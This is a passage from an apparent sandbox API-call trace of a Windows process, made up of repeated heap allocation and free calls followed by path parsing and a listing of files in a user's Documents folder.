(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0091.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0091.038] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.038] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.038] PathFindFileNameW (pszPath="") returned="" [0091.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cdbb5a0, ftCreationTime.dwHighDateTime=0x1d5c588, ftLastAccessTime.dwLowDateTime=0x596039e0, ftLastAccessTime.dwHighDateTime=0x1d5c3f5, ftLastWriteTime.dwLowDateTime=0x596039e0, ftLastWriteTime.dwHighDateTime=0x1d5c3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cdbb5a0, ftCreationTime.dwHighDateTime=0x1d5c588, ftLastAccessTime.dwLowDateTime=0x596039e0, ftLastAccessTime.dwHighDateTime=0x1d5c3f5, ftLastWriteTime.dwLowDateTime=0x596039e0, ftLastWriteTime.dwHighDateTime=0x1d5c3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x469ad960, ftCreationTime.dwHighDateTime=0x1d5c08e, ftLastAccessTime.dwLowDateTime=0xa2a8da0, ftLastAccessTime.dwHighDateTime=0x1d5b61f, ftLastWriteTime.dwLowDateTime=0xa2a8da0, ftLastWriteTime.dwHighDateTime=0x1d5b61f, nFileSizeHigh=0x0, nFileSizeLow=0xf1cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8KNJdo5s Y04PgsO.csv", cAlternateFileName="8KNJDO~1.CSV")) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f815f0, ftCreationTime.dwHighDateTime=0x1d5bf10, ftLastAccessTime.dwLowDateTime=0x41b8d320, ftLastAccessTime.dwHighDateTime=0x1d5c3e0, ftLastWriteTime.dwLowDateTime=0x41b8d320, ftLastWriteTime.dwHighDateTime=0x1d5c3e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D7sre-3HX8SgHUb", cAlternateFileName="D7SRE-~1")) returned 1 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4cd0 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4c58 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df2b0 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4090 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb349b0, ftCreationTime.dwHighDateTime=0x1d5b7a4, ftLastAccessTime.dwLowDateTime=0x52b5f810, ftLastAccessTime.dwHighDateTime=0x1d5b9a4, ftLastWriteTime.dwLowDateTime=0x52b5f810, ftLastWriteTime.dwHighDateTime=0x1d5b9a4, nFileSizeHigh=0x0, nFileSizeLow=0x5408, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kjvzM0zTF.xls", cAlternateFileName="KJVZM0~1.XLS")) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d683390, ftCreationTime.dwHighDateTime=0x1d5bcae, ftLastAccessTime.dwLowDateTime=0x7c516f60, 